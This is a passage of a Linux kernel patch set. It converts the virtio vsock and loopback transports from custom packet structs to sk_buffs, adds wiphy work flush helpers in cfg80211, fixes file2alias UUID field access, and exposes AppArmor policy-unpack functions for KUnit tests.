+-	vsock_addr_init(&src, le64_to_cpu(pkt->hdr.src_cid),
+-			le32_to_cpu(pkt->hdr.src_port));
+-	vsock_addr_init(&dst, le64_to_cpu(pkt->hdr.dst_cid),
+-			le32_to_cpu(pkt->hdr.dst_port));
++	vsock_addr_init(&src, le64_to_cpu(hdr->src_cid),
++			le32_to_cpu(hdr->src_port));
++	vsock_addr_init(&dst, le64_to_cpu(hdr->dst_cid),
++			le32_to_cpu(hdr->dst_port));
+ 
+ 	trace_virtio_transport_recv_pkt(src.svm_cid, src.svm_port,
+ 					dst.svm_cid, dst.svm_port,
+-					le32_to_cpu(pkt->hdr.len),
+-					le16_to_cpu(pkt->hdr.type),
+-					le16_to_cpu(pkt->hdr.op),
+-					le32_to_cpu(pkt->hdr.flags),
+-					le32_to_cpu(pkt->hdr.buf_alloc),
+-					le32_to_cpu(pkt->hdr.fwd_cnt));
+-
+-	if (!virtio_transport_valid_type(le16_to_cpu(pkt->hdr.type))) {
+-		(void)virtio_transport_reset_no_sock(t, pkt);
++					le32_to_cpu(hdr->len),
++					le16_to_cpu(hdr->type),
++					le16_to_cpu(hdr->op),
++					le32_to_cpu(hdr->flags),
++					le32_to_cpu(hdr->buf_alloc),
++					le32_to_cpu(hdr->fwd_cnt));
++
++	if (!virtio_transport_valid_type(le16_to_cpu(hdr->type))) {
++		(void)virtio_transport_reset_no_sock(t, skb);
+ 		goto free_pkt;
+ 	}
+ 
+@@ -1270,30 +1298,35 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
+ 	if (!sk) {
+ 		sk = vsock_find_bound_socket(&dst);
+ 		if (!sk) {
+-			(void)virtio_transport_reset_no_sock(t, pkt);
++			(void)virtio_transport_reset_no_sock(t, skb);
+ 			goto free_pkt;
+ 		}
+ 	}
+ 
+-	if (virtio_transport_get_type(sk) != le16_to_cpu(pkt->hdr.type)) {
+-		(void)virtio_transport_reset_no_sock(t, pkt);
++	if (virtio_transport_get_type(sk) != le16_to_cpu(hdr->type)) {
++		(void)virtio_transport_reset_no_sock(t, skb);
+ 		sock_put(sk);
+ 		goto free_pkt;
+ 	}
+ 
++	if (!skb_set_owner_sk_safe(skb, sk)) {
++		WARN_ONCE(1, "receiving vsock socket has sk_refcnt == 0\n");
++		goto free_pkt;
++	}
++
+ 	vsk = vsock_sk(sk);
+ 
+ 	lock_sock(sk);
+ 
+ 	/* Check if sk has been closed before lock_sock */
+ 	if (sock_flag(sk, SOCK_DONE)) {
+-		(void)virtio_transport_reset_no_sock(t, pkt);
++		(void)virtio_transport_reset_no_sock(t, skb);
+ 		release_sock(sk);
+ 		sock_put(sk);
+ 		goto free_pkt;
+ 	}
+ 
+-	space_available = virtio_transport_space_update(sk, pkt);
++	space_available = virtio_transport_space_update(sk, skb);
+ 
+ 	/* Update CID in case it has changed after a transport reset event */
+ 	if (vsk->local_addr.svm_cid != VMADDR_CID_ANY)
+@@ -1304,23 +1337,23 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
+ 
+ 	switch (sk->sk_state) {
+ 	case TCP_LISTEN:
+-		virtio_transport_recv_listen(sk, pkt, t);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_recv_listen(sk, skb, t);
++		kfree_skb(skb);
+ 		break;
+ 	case TCP_SYN_SENT:
+-		virtio_transport_recv_connecting(sk, pkt);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_recv_connecting(sk, skb);
++		kfree_skb(skb);
+ 		break;
+ 	case TCP_ESTABLISHED:
+-		virtio_transport_recv_connected(sk, pkt);
++		virtio_transport_recv_connected(sk, skb);
+ 		break;
+ 	case TCP_CLOSING:
+-		virtio_transport_recv_disconnecting(sk, pkt);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_recv_disconnecting(sk, skb);
++		kfree_skb(skb);
+ 		break;
+ 	default:
+-		(void)virtio_transport_reset_no_sock(t, pkt);
+-		virtio_transport_free_pkt(pkt);
++		(void)virtio_transport_reset_no_sock(t, skb);
++		kfree_skb(skb);
+ 		break;
+ 	}
+ 
+@@ -1333,16 +1366,42 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
+ 	return;
+ 
+ free_pkt:
+-	virtio_transport_free_pkt(pkt);
++	kfree_skb(skb);
+ }
+ EXPORT_SYMBOL_GPL(virtio_transport_recv_pkt);
+ 
+-void virtio_transport_free_pkt(struct virtio_vsock_pkt *pkt)
++/* Remove skbs found in a queue that have a vsk that matches.
++ *
++ * Each skb is freed.
++ *
++ * Returns the count of skbs that were reply packets.
++ */
++int virtio_transport_purge_skbs(void *vsk, struct sk_buff_head *queue)
+ {
+-	kvfree(pkt->buf);
+-	kfree(pkt);
++	struct sk_buff_head freeme;
++	struct sk_buff *skb, *tmp;
++	int cnt = 0;
++
++	skb_queue_head_init(&freeme);
++
++	spin_lock_bh(&queue->lock);
++	skb_queue_walk_safe(queue, skb, tmp) {
++		if (vsock_sk(skb->sk) != vsk)
++			continue;
++
++		__skb_unlink(skb, queue);
++		__skb_queue_tail(&freeme, skb);
++
++		if (virtio_vsock_skb_reply(skb))
++			cnt++;
++	}
++	spin_unlock_bh(&queue->lock);
++
++	__skb_queue_purge(&freeme);
++
++	return cnt;
+ }
+-EXPORT_SYMBOL_GPL(virtio_transport_free_pkt);
++EXPORT_SYMBOL_GPL(virtio_transport_purge_skbs);
+ 
+ MODULE_LICENSE("GPL v2");
+ MODULE_AUTHOR("Asias He");
+diff --git a/net/vmw_vsock/vsock_loopback.c b/net/vmw_vsock/vsock_loopback.c
+index 169a8cf65b390..89905c092645a 100644
+--- a/net/vmw_vsock/vsock_loopback.c
++++ b/net/vmw_vsock/vsock_loopback.c
+@@ -15,8 +15,7 @@
+ struct vsock_loopback {
+ 	struct workqueue_struct *workqueue;
+ 
+-	spinlock_t pkt_list_lock; /* protects pkt_list */
+-	struct list_head pkt_list;
++	struct sk_buff_head pkt_queue;
+ 	struct work_struct pkt_work;
+ };
+ 
+@@ -27,14 +26,12 @@ static u32 vsock_loopback_get_local_cid(void)
+ 	return VMADDR_CID_LOCAL;
+ }
+ 
+-static int vsock_loopback_send_pkt(struct virtio_vsock_pkt *pkt)
++static int vsock_loopback_send_pkt(struct sk_buff *skb)
+ {
+ 	struct vsock_loopback *vsock = &the_vsock_loopback;
+-	int len = pkt->len;
++	int len = skb->len;
+ 
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	list_add_tail(&pkt->list, &vsock->pkt_list);
+-	spin_unlock_bh(&vsock->pkt_list_lock);
++	skb_queue_tail(&vsock->pkt_queue, skb);
+ 
+ 	queue_work(vsock->workqueue, &vsock->pkt_work);
+ 
+@@ -44,21 +41,8 @@ static int vsock_loopback_send_pkt(struct virtio_vsock_pkt *pkt)
+ static int vsock_loopback_cancel_pkt(struct vsock_sock *vsk)
+ {
+ 	struct vsock_loopback *vsock = &the_vsock_loopback;
+-	struct virtio_vsock_pkt *pkt, *n;
+-	LIST_HEAD(freeme);
+-
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	list_for_each_entry_safe(pkt, n, &vsock->pkt_list, list) {
+-		if (pkt->vsk != vsk)
+-			continue;
+-		list_move(&pkt->list, &freeme);
+-	}
+-	spin_unlock_bh(&vsock->pkt_list_lock);
+ 
+-	list_for_each_entry_safe(pkt, n, &freeme, list) {
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
++	virtio_transport_purge_skbs(vsk, &vsock->pkt_queue);
+ 
+ 	return 0;
+ }
+@@ -121,20 +105,18 @@ static void vsock_loopback_work(struct work_struct *work)
+ {
+ 	struct vsock_loopback *vsock =
+ 		container_of(work, struct vsock_loopback, pkt_work);
+-	LIST_HEAD(pkts);
++	struct sk_buff_head pkts;
++	struct sk_buff *skb;
+ 
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	list_splice_init(&vsock->pkt_list, &pkts);
+-	spin_unlock_bh(&vsock->pkt_list_lock);
++	skb_queue_head_init(&pkts);
+ 
+-	while (!list_empty(&pkts)) {
+-		struct virtio_vsock_pkt *pkt;
++	spin_lock_bh(&vsock->pkt_queue.lock);
++	skb_queue_splice_init(&vsock->pkt_queue, &pkts);
++	spin_unlock_bh(&vsock->pkt_queue.lock);
+ 
+-		pkt = list_first_entry(&pkts, struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-
+-		virtio_transport_deliver_tap_pkt(pkt);
+-		virtio_transport_recv_pkt(&loopback_transport, pkt);
++	while ((skb = __skb_dequeue(&pkts))) {
++		virtio_transport_deliver_tap_pkt(skb);
++		virtio_transport_recv_pkt(&loopback_transport, skb);
+ 	}
+ }
+ 
+@@ -147,8 +129,7 @@ static int __init vsock_loopback_init(void)
+ 	if (!vsock->workqueue)
+ 		return -ENOMEM;
+ 
+-	spin_lock_init(&vsock->pkt_list_lock);
+-	INIT_LIST_HEAD(&vsock->pkt_list);
++	skb_queue_head_init(&vsock->pkt_queue);
+ 	INIT_WORK(&vsock->pkt_work, vsock_loopback_work);
+ 
+ 	ret = vsock_core_register(&loopback_transport.transport,
+@@ -166,20 +147,12 @@ out_wq:
+ static void __exit vsock_loopback_exit(void)
+ {
+ 	struct vsock_loopback *vsock = &the_vsock_loopback;
+-	struct virtio_vsock_pkt *pkt;
+ 
+ 	vsock_core_unregister(&loopback_transport.transport);
+ 
+ 	flush_work(&vsock->pkt_work);
+ 
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	while (!list_empty(&vsock->pkt_list)) {
+-		pkt = list_first_entry(&vsock->pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-	spin_unlock_bh(&vsock->pkt_list_lock);
++	virtio_vsock_skb_queue_purge(&vsock->pkt_queue);
+ 
+ 	destroy_workqueue(vsock->workqueue);
+ }
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index bf2f1f583fb12..63d75fecc2c53 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -1042,7 +1042,8 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy)
+ }
+ EXPORT_SYMBOL(wiphy_rfkill_start_polling);
+ 
+-void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev,
++				  struct wiphy_work *end)
+ {
+ 	unsigned int runaway_limit = 100;
+ 	unsigned long flags;
+@@ -1061,6 +1062,10 @@ void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
+ 		wk->func(&rdev->wiphy, wk);
+ 
+ 		spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++
++		if (wk == end)
++			break;
++
+ 		if (WARN_ON(--runaway_limit == 0))
+ 			INIT_LIST_HEAD(&rdev->wiphy_work_list);
+ 	}
+@@ -1111,7 +1116,7 @@ void wiphy_unregister(struct wiphy *wiphy)
+ #endif
+ 
+ 	/* surely nothing is reachable now, clean up work */
+-	cfg80211_process_wiphy_works(rdev);
++	cfg80211_process_wiphy_works(rdev, NULL);
+ 	wiphy_unlock(&rdev->wiphy);
+ 	rtnl_unlock();
+ 
+@@ -1636,6 +1641,21 @@ void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work)
+ }
+ EXPORT_SYMBOL_GPL(wiphy_work_cancel);
+ 
++void wiphy_work_flush(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	unsigned long flags;
++	bool run;
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	run = !work || !list_empty(&work->entry);
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++
++	if (run)
++		cfg80211_process_wiphy_works(rdev, work);
++}
++EXPORT_SYMBOL_GPL(wiphy_work_flush);
++
+ void wiphy_delayed_work_timer(struct timer_list *t)
+ {
+ 	struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer);
+@@ -1668,6 +1688,16 @@ void wiphy_delayed_work_cancel(struct wiphy *wiphy,
+ }
+ EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel);
+ 
++void wiphy_delayed_work_flush(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork)
++{
++	lockdep_assert_held(&wiphy->mtx);
++
++	del_timer_sync(&dwork->timer);
++	wiphy_work_flush(wiphy, &dwork->work);
++}
++EXPORT_SYMBOL_GPL(wiphy_delayed_work_flush);
++
+ static int __init cfg80211_init(void)
+ {
+ 	int err;
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index 86fd79912254d..e1accacc6f233 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -461,7 +461,8 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev,
+ 			  struct net_device *dev, enum nl80211_iftype ntype,
+ 			  struct vif_params *params);
+ void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev);
+-void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev);
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev,
++				  struct wiphy_work *end);
+ void cfg80211_process_wdev_events(struct wireless_dev *wdev);
+ 
+ bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range,
+diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
+index 4d3b658030105..a88f338c61d31 100644
+--- a/net/wireless/sysfs.c
++++ b/net/wireless/sysfs.c
+@@ -105,14 +105,14 @@ static int wiphy_suspend(struct device *dev)
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
+ 		}
+-		cfg80211_process_wiphy_works(rdev);
++		cfg80211_process_wiphy_works(rdev, NULL);
+ 		if (rdev->ops->suspend)
+ 			ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config);
+ 		if (ret == 1) {
+ 			/* Driver refuse to configure wowlan */
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
+-			cfg80211_process_wiphy_works(rdev);
++			cfg80211_process_wiphy_works(rdev, NULL);
+ 			ret = rdev_suspend(rdev, NULL);
+ 		}
+ 		if (ret == 0)
+diff --git a/scripts/mod/file2alias.c b/scripts/mod/file2alias.c
+index 111d5464c12df..39e2c8883ddd4 100644
+--- a/scripts/mod/file2alias.c
++++ b/scripts/mod/file2alias.c
+@@ -1348,13 +1348,13 @@ static int do_typec_entry(const char *filename, void *symval, char *alias)
+ /* Looks like: tee:uuid */
+ static int do_tee_entry(const char *filename, void *symval, char *alias)
+ {
+-	DEF_FIELD(symval, tee_client_device_id, uuid);
++	DEF_FIELD_ADDR(symval, tee_client_device_id, uuid);
+ 
+ 	sprintf(alias, "tee:%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x",
+-		uuid.b[0], uuid.b[1], uuid.b[2], uuid.b[3], uuid.b[4],
+-		uuid.b[5], uuid.b[6], uuid.b[7], uuid.b[8], uuid.b[9],
+-		uuid.b[10], uuid.b[11], uuid.b[12], uuid.b[13], uuid.b[14],
+-		uuid.b[15]);
++		uuid->b[0], uuid->b[1], uuid->b[2], uuid->b[3], uuid->b[4],
++		uuid->b[5], uuid->b[6], uuid->b[7], uuid->b[8], uuid->b[9],
++		uuid->b[10], uuid->b[11], uuid->b[12], uuid->b[13], uuid->b[14],
++		uuid->b[15]);
+ 
+ 	add_wildcard(alias);
+ 	return 1;
+@@ -1401,10 +1401,10 @@ static int do_mhi_ep_entry(const char *filename, void *symval, char *alias)
+ /* Looks like: ishtp:{guid} */
+ static int do_ishtp_entry(const char *filename, void *symval, char *alias)
+ {
+-	DEF_FIELD(symval, ishtp_device_id, guid);
++	DEF_FIELD_ADDR(symval, ishtp_device_id, guid);
+ 
+ 	strcpy(alias, ISHTP_MODULE_PREFIX "{");
+-	add_guid(alias, guid);
++	add_guid(alias, *guid);
+ 	strcat(alias, "}");
+ 
+ 	return 1;
+diff --git a/security/apparmor/Kconfig b/security/apparmor/Kconfig
+index cb3496e00d8a6..f334e7cccf2da 100644
+--- a/security/apparmor/Kconfig
++++ b/security/apparmor/Kconfig
+@@ -106,8 +106,8 @@ config SECURITY_APPARMOR_PARANOID_LOAD
+ 	  Disabling the check will speed up policy loads.
+ 
+ config SECURITY_APPARMOR_KUNIT_TEST
+-	bool "Build KUnit tests for policy_unpack.c" if !KUNIT_ALL_TESTS
+-	depends on KUNIT=y && SECURITY_APPARMOR
++	tristate "Build KUnit tests for policy_unpack.c" if !KUNIT_ALL_TESTS
++	depends on KUNIT && SECURITY_APPARMOR
+ 	default KUNIT_ALL_TESTS
+ 	help
+ 	  This builds the AppArmor KUnit tests.
+diff --git a/security/apparmor/Makefile b/security/apparmor/Makefile
+index ff23fcfefe196..065f4e346553d 100644
+--- a/security/apparmor/Makefile
++++ b/security/apparmor/Makefile
+@@ -8,6 +8,9 @@ apparmor-y := apparmorfs.o audit.o capability.o task.o ipc.o lib.o match.o \
+               resource.o secid.o file.o policy_ns.o label.o mount.o net.o
+ apparmor-$(CONFIG_SECURITY_APPARMOR_HASH) += crypto.o
+ 
++obj-$(CONFIG_SECURITY_APPARMOR_KUNIT_TEST) += apparmor_policy_unpack_test.o
++apparmor_policy_unpack_test-objs += policy_unpack_test.o
++
+ clean-files := capability_names.h rlim_names.h net_names.h
+ 
+ # Build a lower case string table of address family names
+diff --git a/security/apparmor/include/policy_unpack.h b/security/apparmor/include/policy_unpack.h
+index eb5f7d7f132bb..e89b701447bcb 100644
+--- a/security/apparmor/include/policy_unpack.h
++++ b/security/apparmor/include/policy_unpack.h
+@@ -48,6 +48,43 @@ enum {
+ 	AAFS_LOADDATA_NDENTS		/* count of entries */
+ };
+ 
++/*
++ * The AppArmor interface treats data as a type byte followed by the
++ * actual data.  The interface has the notion of a named entry
++ * which has a name (AA_NAME typecode followed by name string) followed by
++ * the entries typecode and data.  Named types allow for optional
++ * elements and extensions to be added and tested for without breaking
++ * backwards compatibility.
++ */
++
++enum aa_code {
++	AA_U8,
++	AA_U16,
++	AA_U32,
++	AA_U64,
++	AA_NAME,		/* same as string except it is items name */
++	AA_STRING,
++	AA_BLOB,
++	AA_STRUCT,
++	AA_STRUCTEND,
++	AA_LIST,
++	AA_LISTEND,
++	AA_ARRAY,
++	AA_ARRAYEND,
++};
++
++/*
++ * aa_ext is the read of the buffer containing the serialized profile.  The
++ * data is copied into a kernel buffer in apparmorfs and then handed off to
++ * the unpack routines.
++ */
++struct aa_ext {
++	void *start;
++	void *end;
++	void *pos;		/* pointer to current position in the buffer */
++	u32 version;
++};
++
+ /*
+  * struct aa_loaddata - buffer of policy raw_data set
+  *
+@@ -126,4 +163,17 @@ static inline void aa_put_loaddata(struct aa_loaddata *data)
+ 		kref_put(&data->count, aa_loaddata_kref);
+ }
+ 
++#if IS_ENABLED(CONFIG_KUNIT)
++bool aa_inbounds(struct aa_ext *e, size_t size);
++size_t aa_unpack_u16_chunk(struct aa_ext *e, char **chunk);
++bool aa_unpack_X(struct aa_ext *e, enum aa_code code);
++bool aa_unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name);
++bool aa_unpack_u32(struct aa_ext *e, u32 *data, const char *name);
++bool aa_unpack_u64(struct aa_ext *e, u64 *data, const char *name);
++size_t aa_unpack_array(struct aa_ext *e, const char *name);
++size_t aa_unpack_blob(struct aa_ext *e, char **blob, const char *name);
++int aa_unpack_str(struct aa_ext *e, const char **string, const char *name);
++int aa_unpack_strdup(struct aa_ext *e, char **string, const char *name);
++#endif
++
+ #endif /* __POLICY_INTERFACE_H */
+diff --git a/security/apparmor/policy.c b/security/apparmor/policy.c
+index fbdfcef91c616..c7b84fb568414 100644
+--- a/security/apparmor/policy.c
++++ b/security/apparmor/policy.c
+@@ -218,6 +218,7 @@ void aa_free_profile(struct aa_profile *profile)
+ 
+ 	aa_put_ns(profile->ns);
+ 	kfree_sensitive(profile->rename);
++	kfree_sensitive(profile->disconnected);
+ 
+ 	aa_free_file_rules(&profile->file);
+ 	aa_free_cap_rules(&profile->caps);
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 9c3fec2c7cf6b..7012fd82f1bb1 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -14,6 +14,7 @@
+  */
+ 
+ #include <asm/unaligned.h>
++#include <kunit/visibility.h>
+ #include <linux/ctype.h>
+ #include <linux/errno.h>
+ #include <linux/zlib.h>
+@@ -37,43 +38,6 @@
+ #define v7	7
+ #define v8	8	/* full network masking */
+ 
+-/*
+- * The AppArmor interface treats data as a type byte followed by the
+- * actual data.  The interface has the notion of a named entry
+- * which has a name (AA_NAME typecode followed by name string) followed by
+- * the entries typecode and data.  Named types allow for optional
+- * elements and extensions to be added and tested for without breaking
+- * backwards compatibility.
+- */
+-
+-enum aa_code {
+-	AA_U8,
+-	AA_U16,
+-	AA_U32,
+-	AA_U64,
+-	AA_NAME,		/* same as string except it is items name */
+-	AA_STRING,
+-	AA_BLOB,
+-	AA_STRUCT,
+-	AA_STRUCTEND,
+-	AA_LIST,
+-	AA_LISTEND,
+-	AA_ARRAY,
+-	AA_ARRAYEND,
+-};
+-
+-/*
+- * aa_ext is the read of the buffer containing the serialized profile.  The
+- * data is copied into a kernel buffer in apparmorfs and then handed off to
+- * the unpack routines.
+- */
+-struct aa_ext {
+-	void *start;
+-	void *end;
+-	void *pos;		/* pointer to current position in the buffer */
+-	u32 version;
+-};
+-
+ /* audit callback for unpack fields */
+ static void audit_cb(struct audit_buffer *ab, void *va)
+ {
+@@ -199,10 +163,11 @@ struct aa_loaddata *aa_loaddata_alloc(size_t size)
+ }
+ 
+ /* test if read will be in packed data bounds */
+-static bool inbounds(struct aa_ext *e, size_t size)
++VISIBLE_IF_KUNIT bool aa_inbounds(struct aa_ext *e, size_t size)
+ {
+ 	return (size <= e->end - e->pos);
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_inbounds);
+ 
+ static void *kvmemdup(const void *src, size_t len)
+ {
+@@ -214,22 +179,22 @@ static void *kvmemdup(const void *src, size_t len)
+ }
+ 
+ /**
+- * unpack_u16_chunk - test and do bounds checking for a u16 size based chunk
++ * aa_unpack_u16_chunk - test and do bounds checking for a u16 size based chunk
+  * @e: serialized data read head (NOT NULL)
+  * @chunk: start address for chunk of data (NOT NULL)
+  *
+  * Returns: the size of chunk found with the read head at the end of the chunk.
+  */
+-static size_t unpack_u16_chunk(struct aa_ext *e, char **chunk)
++VISIBLE_IF_KUNIT size_t aa_unpack_u16_chunk(struct aa_ext *e, char **chunk)
+ {
+ 	size_t size = 0;
+ 	void *pos = e->pos;
+ 
+-	if (!inbounds(e, sizeof(u16)))
++	if (!aa_inbounds(e, sizeof(u16)))
+ 		goto fail;
+ 	size = le16_to_cpu(get_unaligned((__le16 *) e->pos));
+ 	e->pos += sizeof(__le16);
+-	if (!inbounds(e, size))
++	if (!aa_inbounds(e, size))
+ 		goto fail;
+ 	*chunk = e->pos;
+ 	e->pos += size;
+@@ -239,20 +204,22 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_u16_chunk);
+ 
+ /* unpack control byte */
+-static bool unpack_X(struct aa_ext *e, enum aa_code code)
++VISIBLE_IF_KUNIT bool aa_unpack_X(struct aa_ext *e, enum aa_code code)
+ {
+-	if (!inbounds(e, 1))
++	if (!aa_inbounds(e, 1))
+ 		return false;
+ 	if (*(u8 *) e->pos != code)
+ 		return false;
+ 	e->pos++;
+ 	return true;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_X);
+ 
+ /**
+- * unpack_nameX - check is the next element is of type X with a name of @name
++ * aa_unpack_nameX - check is the next element is of type X with a name of @name
+  * @e: serialized data extent information  (NOT NULL)
+  * @code: type code
+  * @name: name to match to the serialized element.  (MAYBE NULL)
+@@ -267,7 +234,7 @@ static bool unpack_X(struct aa_ext *e, enum aa_code code)
+  *
+  * Returns: false if either match fails, the read head does not move
+  */
+-static bool unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
++VISIBLE_IF_KUNIT bool aa_unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
+ {
+ 	/*
+ 	 * May need to reset pos if name or type doesn't match
+@@ -277,9 +244,9 @@ static bool unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
+ 	 * Check for presence of a tagname, and if present name size
+ 	 * AA_NAME tag value is a u16.
+ 	 */
+-	if (unpack_X(e, AA_NAME)) {
++	if (aa_unpack_X(e, AA_NAME)) {
+ 		char *tag = NULL;
+-		size_t size = unpack_u16_chunk(e, &tag);
++		size_t size = aa_unpack_u16_chunk(e, &tag);
+ 		/* if a name is specified it must match. otherwise skip tag */
+ 		if (name && (!size || tag[size-1] != '\0' || strcmp(name, tag)))
+ 			goto fail;
+@@ -289,20 +256,21 @@ static bool unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
+ 	}
+ 
+ 	/* now check if type code matches */
+-	if (unpack_X(e, code))
++	if (aa_unpack_X(e, code))
+ 		return true;
+ 
+ fail:
+ 	e->pos = pos;
+ 	return false;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_nameX);
+ 
+ static bool unpack_u8(struct aa_ext *e, u8 *data, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_U8, name)) {
+-		if (!inbounds(e, sizeof(u8)))
++	if (aa_unpack_nameX(e, AA_U8, name)) {
++		if (!aa_inbounds(e, sizeof(u8)))
+ 			goto fail;
+ 		if (data)
+ 			*data = *((u8 *)e->pos);
+@@ -315,12 +283,12 @@ fail:
+ 	return false;
+ }
+ 
+-static bool unpack_u32(struct aa_ext *e, u32 *data, const char *name)
++VISIBLE_IF_KUNIT bool aa_unpack_u32(struct aa_ext *e, u32 *data, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_U32, name)) {
+-		if (!inbounds(e, sizeof(u32)))
++	if (aa_unpack_nameX(e, AA_U32, name)) {
++		if (!aa_inbounds(e, sizeof(u32)))
+ 			goto fail;
+ 		if (data)
+ 			*data = le32_to_cpu(get_unaligned((__le32 *) e->pos));
+@@ -332,13 +300,14 @@ fail:
+ 	e->pos = pos;
+ 	return false;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_u32);
+ 
+-static bool unpack_u64(struct aa_ext *e, u64 *data, const char *name)
++VISIBLE_IF_KUNIT bool aa_unpack_u64(struct aa_ext *e, u64 *data, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_U64, name)) {
+-		if (!inbounds(e, sizeof(u64)))
++	if (aa_unpack_nameX(e, AA_U64, name)) {
++		if (!aa_inbounds(e, sizeof(u64)))
+ 			goto fail;
+ 		if (data)
+ 			*data = le64_to_cpu(get_unaligned((__le64 *) e->pos));
+@@ -350,14 +319,15 @@ fail:
+ 	e->pos = pos;
+ 	return false;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_u64);
+ 
+-static size_t unpack_array(struct aa_ext *e, const char *name)
++VISIBLE_IF_KUNIT size_t aa_unpack_array(struct aa_ext *e, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_ARRAY, name)) {
++	if (aa_unpack_nameX(e, AA_ARRAY, name)) {
+ 		int size;
+-		if (!inbounds(e, sizeof(u16)))
++		if (!aa_inbounds(e, sizeof(u16)))
+ 			goto fail;
+ 		size = (int)le16_to_cpu(get_unaligned((__le16 *) e->pos));
+ 		e->pos += sizeof(u16);
+@@ -368,18 +338,19 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_array);
+ 
+-static size_t unpack_blob(struct aa_ext *e, char **blob, const char *name)
++VISIBLE_IF_KUNIT size_t aa_unpack_blob(struct aa_ext *e, char **blob, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_BLOB, name)) {
++	if (aa_unpack_nameX(e, AA_BLOB, name)) {
+ 		u32 size;
+-		if (!inbounds(e, sizeof(u32)))
++		if (!aa_inbounds(e, sizeof(u32)))
+ 			goto fail;
+ 		size = le32_to_cpu(get_unaligned((__le32 *) e->pos));
+ 		e->pos += sizeof(u32);
+-		if (inbounds(e, (size_t) size)) {
++		if (aa_inbounds(e, (size_t) size)) {
+ 			*blob = e->pos;
+ 			e->pos += size;
+ 			return size;
+@@ -390,15 +361,16 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_blob);
+ 
+-static int unpack_str(struct aa_ext *e, const char **string, const char *name)
++VISIBLE_IF_KUNIT int aa_unpack_str(struct aa_ext *e, const char **string, const char *name)
+ {
+ 	char *src_str;
+ 	size_t size = 0;
+ 	void *pos = e->pos;
+ 	*string = NULL;
+-	if (unpack_nameX(e, AA_STRING, name)) {
+-		size = unpack_u16_chunk(e, &src_str);
++	if (aa_unpack_nameX(e, AA_STRING, name)) {
++		size = aa_unpack_u16_chunk(e, &src_str);
+ 		if (size) {
+ 			/* strings are null terminated, length is size - 1 */
+ 			if (src_str[size - 1] != 0)
+@@ -413,12 +385,13 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_str);
+ 
+-static int unpack_strdup(struct aa_ext *e, char **string, const char *name)
++VISIBLE_IF_KUNIT int aa_unpack_strdup(struct aa_ext *e, char **string, const char *name)
+ {
+ 	const char *tmp;
+ 	void *pos = e->pos;
+-	int res = unpack_str(e, &tmp, name);
++	int res = aa_unpack_str(e, &tmp, name);
+ 	*string = NULL;
